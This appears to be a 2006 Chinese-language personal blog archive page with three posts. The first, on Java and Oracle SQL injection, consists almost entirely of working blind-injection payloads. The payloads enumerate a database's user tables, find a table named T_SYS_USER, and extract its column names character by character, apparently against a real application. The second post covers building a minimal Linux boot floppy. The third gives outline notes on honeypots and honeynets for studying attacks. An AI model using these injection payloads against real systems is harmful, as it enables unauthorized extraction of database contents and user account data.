蜗牛的轨迹: April, 2006

<< First < Previous Next > Last >>

April 03

SQLInject(Java+Oracle)

SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES where TABLE_NAME like '%USER%' ORDER BY 1ASC)WHERE ROWNUM<=3)ORDER BY 1DESC)WHERE ROWNUM<=1

1' or 0<=nvl(length((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES where table_name like '%USER%' ORDER BY 1ASC)WHERE ROWNUM<=1)ORDER BY 1DESC)WHERE ROWNUM<=1)),0) --

select nvl(length((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES where table_name like '%USER%' ORDER BY 1ASC)WHERE ROWNUM<=1)ORDER BY 1DESC)WHERE ROWNUM<=1)),0) from user_tables

确定还有USER的第一个用户表的长度：

1' or 0<=nvl(length((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES where table_name like '%USER%' ORDER BY 1ASC)WHERE ROWNUM<=1)ORDER BY 1DESC)WHERE ROWNUM<=1)),0) --

1' or 25<=nvl(length((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES where table_name like '%USER%' ORDER BY 1ASC)WHERE ROWNUM<=1)ORDER BY 1DESC)WHERE ROWNUM<=1)),0) --

确定还有USER的第二个用户表的长度：

1' or 0<=nvl(length((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES where table_name like '%USER%' ORDER BY 1ASC)WHERE ROWNUM<=2)ORDER BY 1DESC)WHERE ROWNUM<=1)),0) --

确定第一个用户表名称的第一个字母：

1' or ascii('T')=ascii(substr((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES where table_name like '%USER%' ORDER BY 1ASC)WHERE ROWNUM<=1)ORDER BY 1DESC)WHERE ROWNUM<=1),1,1))--

确定第二个用户表名称的第二个字母：

1' or ascii('T')=ascii(substr((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES where table_name like '%USER%' ORDER BY 1ASC)WHERE ROWNUM<=2)ORDER BY 1DESC)WHERE ROWNUM<=1),2,1))--

确定第三个用户表名称的第1个字母：

1' or ascii('T')=ascii(substr((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES where table_name like '%USER%' ORDER BY 1ASC)WHERE ROWNUM<=3)ORDER BY 1DESC)WHERE ROWNUM<=1),1,1))--

1' or ascii('_')=ascii(substr((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES where table_name like '%USER%' ORDER BY 1ASC)WHERE ROWNUM<=3)ORDER BY 1DESC)WHERE ROWNUM<=1),2,1))--

T_SYS_USER

1' or 0<=nvl(length((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68))),0)

确定第三个用户表列的个数：

1' or 11=nvl((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME='T_SYS_USER'),0)--

确定第三个用户表第一列列名的长度：

1' or 0<=nvl(length((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME='T_SYS_USER' ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1)),0) --

1' or 8=nvl(length((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME='T_SYS_USER' ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1)),0) --

确定第三个用户表第一列列名的第一个字母：

1' or ascii('A')=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME='T_SYS_USER' ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),1,1)) --

确定第三个用户表第一列列名的第2个字母：

1' or ascii('S')=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME='T_SYS_USER' ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),2,1)) --

Mini Linux

No network support!!! Only have a base file system!

dd if=/dev/zero of=fsfile bs=1k count=4096

mke2fs -m 0 -N 2000 ./fsfile

mount -o loop -t ext2 fsfile /mnt/

cd /mnt

mkdir dev

cp -dpR /dev/tty[0-6] /mnt/dev/

cp -dpR /dev/fd[01]* /mnt/dev/

cp -dpR /dev/console /mnt/dev/

cp -dpR /dev/kmem /mnt/dev/

cp -dpR /dev/mem /mnt/dev/

cp -dpR /dev/null /mnt/dev/

cp -dpR /dev/ram0 /mnt/dev/

mkdir etc

mkdir rc.d

touch fstab

touch inittab

touch gettydefs

cp /etc/passwd .

cp /etc/ group .

cp /etc/ shadow .

cp /etc/termcap .

vi /mnt/etc/rc

#!/bin/sh

/bin/mount -av

/bin/hostname dec0y

vi /mnt/etc/fstab

/dev/ram0 / ext2 defaults

/dev/fd0 / ext2 defaults

/proc /proc proc defaults

vi /mnt/etc/inittab

id:2:initdefault:

si::sysinit:/etc/rc

1:2345:respawn:/sbin/getty 9600 tty1

2:23:respawn:/sbin/getty 9600 tty2

mkdir /mnt/lib

cp -R /lib/ld-* .

cp -R /lib/libdl* .

cp -R /lib/libc* .

umount /mnt

dd if=fsfile bs=1k | gzip -v9 > fsfile.gz

dd if=/dev/zero of=bootdisk bs=1k count=2880

mkfs.msdos bootdisk

mount -o loop -t msdos bootdisk /mnt/

syslinux -s

vi /mnt/syslinux.cfg

display display.txt

default linux

timeout 10

prompt 1

label linux

kernel linux

append initrd=fsfile.gz root=/dev/ram0 ramdisk_size=5120

mount -o loop -t ext2 fsfile /mnt

dd if=fsfile bs=1k | gzip -v9 > fsfile.gz

mount -o loop -t msdos bootdisk /mnt/

cp fsfile.gz /mnt/

3:13 PM | Add a comment | Permalink | Blog it | Computers and Internet

蜜罐

蜜罐简介

蜜罐技术的提出

DTK: Deception Tool Kit
Metaspoit
0-day exploit: packetstorm

蜜罐概念

监视、检测攻击

分类

交互性：
低交互性（honeyd/nepenthes）模拟服务和操作系统
高交互性：真实的操作系统和服务、风险比较高，如：蜜网
虚拟蜜罐：类似高交互

优势

高保真数据
捕获未知攻击，与IDS不同
非资源密集
原理简单

Honeyd

2005年 Google
模拟多个IP，一个B类网段
模拟协议栈，不模拟操作系统
以脚本方式提供网络服务
支持ICMP
支持代理
监控未使用的IP地址
接受网络流量：arp（监控未使用的IP地址），路由
只在网络层交互，不会影响到宿主

Nepenthes

专用蜜罐工具
恶意软件、防病毒
mwcollect vs nepenthes: nepenthes win
模拟常见漏洞
交互过程中获取shellcode，从而获取URL

发展历程

Honeypot：DTK,Honeyd,nepenthes,mwcollect
Honeynet: The honeynet project, Gen1/Gen2/Gen3 Honeynet
Honeyfarm:

Gen3密网技术

原理和历程

研究型、高交互型、可控、一个或多个蜜罐
HoneyWall CDROM

技术框架、核心需求

HoneyWall
数据控制：snort_inline（已知攻击）、iptables（扫描、dos）
数据捕获：

快数据通道网络行为（Argus、snort、p0f）、系统行为 sebek@honeypot对进程文件命令
慢数据通道：tcpdump

数据分析

walleye

应用举例（僵尸网络）

发现方法：

IDS，程序指纹
行为监测法：快速连接、长时间在线发呆
蜜罐捕获

恶意软件捕获

Nepenthes只能捕获已知的
MWWatcher/MWFetcher/PotManager难以识别、控制

恶意软件分析

获取控制信道：控制服务器、口令、频道、频道口令、用户名和昵称结构
静态程序分析：MWDissector、逆向工程
动态行为分析：sndbox.norman.no、在线分析、API Hooking:HoneySniff

2:58 PM | Add a comment | Permalink | Blog it | Computers and Internet